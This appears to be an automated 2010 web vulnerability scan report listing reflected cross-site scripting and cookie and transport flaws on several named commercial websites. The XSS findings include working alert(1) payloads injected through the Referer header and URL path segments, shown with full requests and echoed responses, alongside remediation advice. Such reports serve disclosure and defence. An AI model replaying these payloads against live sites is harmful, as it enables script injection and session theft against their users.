Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string the the backslash character should be blocked, or escaped by replacing it with two backslashes.
Request
GET / HTTP/1.1 Host: www.personified.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.google.com/search?hl=en&q=bd607\'%3balert(1)//ab073727a3c
Response (redirected)
HTTP/1.1 200 OK Cache-Control: private Content-Length: 21355 Content-Type: text/html; charset=UTF-8 Content-Language: en-US Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml" Set-Cookie: CB%5FSID=3961e103eb734046a6e96ced5923619a-343075494-w9-6; domain=.personified.com; path=/; HttpOnly Set-Cookie: BID=X13ACF19327AEAC650EE943F0B9D2A61E0001302FED0AB3B2DB395E610AE6157B3DC7E7D91670452E8A9E11790CE1B74F4; domain=.personified.com; expires=Mon, 14-Nov-2011 23:44:53 GMT; path=/; HttpOnly X-Powered-By: ASP.NET X-PBY: BEAR9 Date: Sun, 14 Nov 2010 23:44:53 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html id="HTMLTag" xml:lang="en-US" lang="en-US"> <head><title> Person ...[SNIP]... www.personified.com'; s_cb.eVar8='www.personified.com/PD/Default.aspx'; s_cb.eVar11='NotRegistered'; s_cb.eVar15='NO_NotRegistered'; s_cb.eVar16='natural (google) - bd607\\';alert(1)//ab073727a3c'; /************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/ var s_code=s_cb.t();if(s_code)document.write(s_code)//--> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 53943"style%3d"x%3aexpression(alert(1))"ef2ae5dae94 was submitted in the REST URL parameter 1. This input was echoed as 53943"style="x:expression(alert(1))"ef2ae5dae94 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /go53943"style%3d"x%3aexpression(alert(1))"ef2ae5dae94/crp/buyingGuides/Story.jsp HTTP/1.1 Host: research.cars.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 301 Moved Permanently Date: Sun, 14 Nov 2010 22:31:20 GMT Location: http://www.cars.com/go53943"style="x:expression(alert(1))"ef2ae5dae94/crp/buyingGuides/Story.jsp X-Pad: avoid browser bug Server: Oracle9iAS/9.0.2 Apache Oracle9iAS-Web-Cache/9.0.2.2.0 (N) Content-Length: 300 Content-Type: text/html; charset=iso-8859-1 Connection: Close
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <HTML><HEAD> <TITLE>301 Moved Permanently</TITLE> </HEAD><BODY> <H1>Moved Permanently</H1> The document has moved <A HREF="http://www.cars.com/go53943"style="x:expression(alert(1))"ef2ae5dae94/crp/buyingGuides/Story.jsp"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 52a17"style%3d"x%3aexpression(alert(1))"18505d387d9 was submitted in the REST URL parameter 2. This input was echoed as 52a17"style="x:expression(alert(1))"18505d387d9 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /go/crp52a17"style%3d"x%3aexpression(alert(1))"18505d387d9/buyingGuides/Story.jsp HTTP/1.1 Host: research.cars.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 301 Moved Permanently Date: Sun, 14 Nov 2010 22:31:21 GMT Location: http://www.cars.com/go/crp52a17"style="x:expression(alert(1))"18505d387d9/buyingGuides/Story.jsp X-Pad: avoid browser bug Server: Oracle9iAS/9.0.2 Apache Oracle9iAS-Web-Cache/9.0.2.0.0 (N) Content-Length: 300 Content-Type: text/html; charset=iso-8859-1 Connection: Close
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <HTML><HEAD> <TITLE>301 Moved Permanently</TITLE> </HEAD><BODY> <H1>Moved Permanently</H1> The document has moved <A HREF="http://www.cars.com/go/crp52a17"style="x:expression(alert(1))"18505d387d9/buyingGuides/Story.jsp"> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5e2e9"style%3d"x%3aexpression(alert(1))"c9171920ef1 was submitted in the REST URL parameter 3. This input was echoed as 5e2e9"style="x:expression(alert(1))"c9171920ef1 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /go/crp/5e2e9"style%3d"x%3aexpression(alert(1))"c9171920ef1/Story.jsp HTTP/1.1 Host: research.cars.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 301 Moved Permanently Date: Sun, 14 Nov 2010 22:31:21 GMT Location: http://www.cars.com/go/crp/5e2e9"style="x:expression(alert(1))"c9171920ef1/Story.jsp Server: Oracle9iAS/9.0.2 Apache Oracle9iAS-Web-Cache/9.0.2.0.0 (N) Content-Length: 288 Content-Type: text/html; charset=iso-8859-1 Connection: Close
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <HTML><HEAD> <TITLE>301 Moved Permanently</TITLE> </HEAD><BODY> <H1>Moved Permanently</H1> The document has moved <A HREF="http://www.cars.com/go/crp/5e2e9"style="x:expression(alert(1))"c9171920ef1/Story.jsp"> ...[SNIP]...
The page contains a form with the following action URL, which is submitted over clear-text HTTP:
http://www.evenflo.com/login.aspx
The form contains the following password field:
ctl00$phMainContent$Login1$Password
Issue background
Passwords submitted over an unencrypted connection are vulnerable to capture by an attacker who is suitably positioned on the network. This includes any malicious party located on the user's own network, within their ISP, within the ISP used by the application, and within the application's hosting infrastructure. Even if switched networks are employed at some of these locations, techniques exist to circumvent this defense and monitor the traffic passing through switches.
Issue remediation
The application should use transport-level encryption (SSL or TLS) to protect all sensitive communications passing between the client and the server. Communications that should be protected include the login mechanism and related functionality, and any functions where sensitive data can be accessed or privileged actions can be performed. These areas of the application should employ their own session handling mechanism, and the session tokens used should never be transmitted over unencrypted communications. If HTTP cookies are used for transmitting session tokens, then the secure flag should be set to prevent transmission over clear-text HTTP.
Request
GET /login.aspx HTTP/1.1 Host: www.evenflo.com Proxy-Connection: keep-alive Referer: http://www.evenflo.com/ Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ASP.NET_SessionId=ocz1hqfc13zpwujpj3hjkbmi; otmData=languagePref=en-us; Linkshare.PPC=u1=Organic; Amazon.PPC=tag=evenfloSEO-20; __utmz=17189485.1289784078.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=17189485.2106858154.1289784078.1289784078.1289784078.1; __utmc=17189485; __utmb=17189485.1.10.1289784078
Response
HTTP/1.1 200 OK Date: Mon, 15 Nov 2010 01:21:32 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 33835
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The following cookie was issued by the application and does not have the secure flag set:
JSESSIONID=0ZTMTTJL4N3CACUUCAXCFEY; path=/
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Issue background
If the secure flag is set on a cookie, then browsers will not submit the cookie in any requests that use an unencrypted HTTP connection, thereby preventing the cookie from being trivially intercepted by an attacker monitoring network traffic. If the secure flag is not set, then the cookie will be transmitted in clear-text if the user visits any HTTP URLs within the cookie's scope. An attacker may be able to induce this event by feeding a user suitable links, either directly or via another web site. Even if the domain which issued the cookie does not host any content that is accessed over HTTP, an attacker may be able to use links of the form http://example.com:443/ to perform the same attack.
Issue remediation
The secure flag should be set on all cookies that are used for transmitting sensitive data when accessing content over HTTPS. If cookies are used to transmit session tokens, then areas of the application that are accessed over HTTPS should employ their own session handling mechanism, and the session tokens used should never be transmitted over unencrypted communications.
HTTP/1.1 200 OK Date: Mon, 15 Nov 2010 04:07:48 GMT Server: Apache/2.0.52 (Red Hat) Set-Cookie: JSESSIONID=0ZTMTTJL4N3CACUUCAXCFEY; path=/ Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT Content-Language: en-US Connection: close Content-Type: text/html;charset=UTF-8
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><META NAME='description' CONTENT='silicon valley tech gmsv'><meta name="keywords" content="silicon valley tech gmsv"/><title> ...[SNIP]...
5. Session token in URLpreviousnext There are 2 instances of this issue:
Sensitive information within URLs may be logged in various locations, including the user's browser, the web server, and any forward or reverse proxy servers between the two endpoints. URLs may also be displayed on-screen, bookmarked or emailed around by users. They may be disclosed to third parties via the Referer header when any off-site links are followed. Placing session tokens into the URL increases the risk that they will be captured by an attacker.
Issue remediation
The application should use an alternative mechanism for transmitting session tokens, such as HTTP cookies or hidden fields in forms that are submitted using the POST method.
HTTP/1.1 200 OK Date: Mon, 15 Nov 2010 04:07:48 GMT Server: Apache/2.0.52 (Red Hat) Set-Cookie: JSESSIONID=0ZTMTTJL4N3CACUUCAXCFEY; path=/ Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT Content-Language: en-US Connection: close Content-Type: text/html;charset=UTF-8
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><META NAME='description' CONTENT='silicon valley tech gmsv'><meta name="keywords" content="silicon valley tech gmsv"/><title> ...[SNIP]... <div class="block GMSV_newsletter"><a href="https://secure.www.siliconvalley.com/registration/?rPage=login&url=http%3A%2F%2Fwww.siliconvalley.com%2F&eRightsSessionExpired=true">Get the GMSV <br> ...[SNIP]...
HTTP/1.1 404 Not Found Date: Mon, 15 Nov 2010 04:07:58 GMT Server: Apache/2.0.52 (Red Hat) Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT Content-Language: en-US Connection: close Content-Type: text/html
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><META NAME='description' CONTENT='Registration'><title>Registration - SiliconValley.com</title><!-- get profile info --><!-- ...[SNIP]...
6. Cookie without HttpOnly flag setpreviousnext There are 3 instances of this issue:
If the HttpOnly attribute is set on a cookie, then the cookie's value cannot be read or set by client-side JavaScript. This measure can prevent certain client-side attacks, such as cross-site scripting, from trivially capturing the cookie's value via an injected script.
Issue remediation
There is usually no good reason not to set the HttpOnly flag on all cookies. Unless you specifically require legitimate client-side scripts within your application to read or set a cookie's value, you should set the HttpOnly flag by including this attribute within the relevant Set-cookie directive.
You should be aware that the restrictions imposed by the HttpOnly flag can potentially be circumvented in some circumstances, and that numerous other serious attacks can be delivered by client-side script injection, aside from simple cookie stealing.
The following cookie was issued by the application and does not have the HttpOnly flag set:
JSESSIONID=0ZTMTTJL4N3CACUUCAXCFEY; path=/
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
HTTP/1.1 200 OK Date: Mon, 15 Nov 2010 04:07:48 GMT Server: Apache/2.0.52 (Red Hat) Set-Cookie: JSESSIONID=0ZTMTTJL4N3CACUUCAXCFEY; path=/ Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT Content-Language: en-US Connection: close Content-Type: text/html;charset=UTF-8
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><META NAME='description' CONTENT='silicon valley tech gmsv'><meta name="keywords" content="silicon valley tech gmsv"/><title> ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
The following cookie was issued by the application and does not have the HttpOnly flag set:
s_vi_khaoup=[CS]v4|0-0|4CE0B217[CE]; Expires=Sat, 14 Nov 2015 04:07:51 GMT; Domain=.2o7.net; Path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
A cookie's domain attribute determines which domains can access the cookie. Browsers will automatically submit the cookie in requests to in-scope domains, and those domains will also be able to access the cookie via JavaScript. If a cookie is scoped to a parent domain, then that cookie will be accessible by the parent domain and also by any other subdomains of the parent domain. If the cookie contains sensitive data (such as a session token) then this data may be accessible by less trusted or less secure applications residing at those domains, leading to a security compromise.
Issue remediation
By default, cookies are scoped to the issuing domain and all subdomains. If you remove the explicit domain attribute from your Set-cookie directive, then the cookie will have this default scope, which is safe and appropriate in most situations. If you particularly need a cookie to be accessible by a parent domain, then you should thoroughly review the security of the applications residing on that domain and its subdomains, and confirm that you are willing to trust the people and systems which support those applications.
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
The following cookie was issued by the application and is scoped to a parent of the issuing domain:
s_vi_khaoup=[CS]v4|0-0|4CE0B217[CE]; Expires=Sat, 14 Nov 2015 04:07:51 GMT; Domain=.2o7.net; Path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
When a web browser makes a request for a resource, it typically adds an HTTP header, called the "Referer" header, indicating the URL of the resource from which the request originated. This occurs in numerous situations, for example when a web page loads an image or script, or when a user clicks on a link or submits a form.
If the resource being requested resides on a different domain, then the Referer header is still generally included in the cross-domain request. If the originating URL contains any sensitive information within its query string, such as a session token, then this information will be transmitted to the other domain. If the other domain is not fully trusted by the application, then this may lead to a security compromise.
You should review the contents of the information being transmitted to other domains, and also determine whether those domains are fully trusted by the originating application.
Today's browsers may withhold the Referer header in some situations (for example, when loading a non-HTTPS resource from a page that was loaded over HTTPS, or when a Refresh directive is issued), but this behaviour should not be relied upon to protect the originating URL from disclosure.
Note also that if users can author content within the application then an attacker may be able to inject links referring to a domain they control in order to capture data from URLs used within the application.
Issue remediation
The application should never transmit any sensitive information within the URL query string. In addition to being leaked in the Referer header, such information may be logged in various locations and may be visible on-screen to untrusted parties.
When an application includes a script from an external domain, this script is executed by the browser within the security context of the invoking application. The script can therefore do anything that the application's own scripts can do, such as accessing application data and performing actions within the context of the current user.
If you include a script from an external domain, then you are trusting that domain with the data and functionality of your application, and you are trusting the domain's own security to prevent an attacker from modifying the script to perform malicious actions within your application.
Issue remediation
Scripts should not be included from untrusted domains. If you have a requirement which a third-party script appears to fulfil, then you should ideally copy the contents of that script onto your own domain and include it from there. If that is not possible (e.g. for licensing reasons) then you should consider reimplementing the script's functionality within your own code.
The presence of email addresses within application responses does not necessarily constitute a security vulnerability. Email addresses may appear intentionally within contact information, and many applications (such as web mail) include arbitrary third-party email addresses within their core content.
However, email addresses of developers and other individuals (whether appearing on-screen or hidden within page source) may disclose information that is useful to an attacker; for example, they may represent usernames that can be used at the application's login, and they may be used in social engineering attacks against the organisation's personnel. Unnecessary or excessive disclosure of email addresses may also lead to an increase in the volume of spam email received.
Issue remediation
You should review the email addresses being disclosed by the application, and consider removing any that are unnecessary, or replacing personal addresses with anonymous mailbox addresses (such as helpdesk@example.com).
HTTP/1.1 200 OK Date: Mon, 15 Nov 2010 04:07:48 GMT Server: Apache/2.0.52 (Red Hat) Set-Cookie: JSESSIONID=0ZTMTTJL4N3CACUUCAXCFEY; path=/ Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT Content-Language: en-US Connection: close Content-Type: text/html;charset=UTF-8
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><META NAME='description' CONTENT='silicon valley tech gmsv'><meta name="keywords" content="silicon valley tech gmsv"/><title> ...[SNIP]... <a href="http://www.siliconvalley.com/ci_16596547" class="listingItemTitle">Biz Break: Will yourname@facebook.com be your new e-mail address?</a> ...[SNIP]... <a href="http://www.siliconvalley.com/ci_16596547?source=most_viewed">Biz Break: Will yourname@facebook.com be your new e-mail address?</a> ...[SNIP]...
If a web response states that it contains HTML content but does not specify a character set, then the browser may analyse the HTML and attempt to determine which character set it appears to be using. Even if the majority of the HTML actually employs a standard character set such as UTF-8, the presence of non-standard characters anywhere in the response may cause the browser to interpret the content using a different character set. This can have unexpected results, and can lead to cross-site scripting vulnerabilities in which non-standard encodings like UTF-7 can be used to bypass the application's defensive filters.
In most cases, the absence of a charset directive does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.
Issue remediation
For every response containing HTML content, the application should include within the Content-type header a directive specifying a standard recognised character set, for example charset=ISO-8859-1.
HTTP/1.1 404 Not Found Date: Mon, 15 Nov 2010 04:07:58 GMT Server: Apache/2.0.52 (Red Hat) Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT Content-Language: en-US Connection: close Content-Type: text/html
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><META NAME='description' CONTENT='Registration'><title>Registration - SiliconValley.com</title><!-- get profile info --><!-- ...[SNIP]...
Report generated by XSS.CX at Sun Nov 14 22:14:00 CST 2010.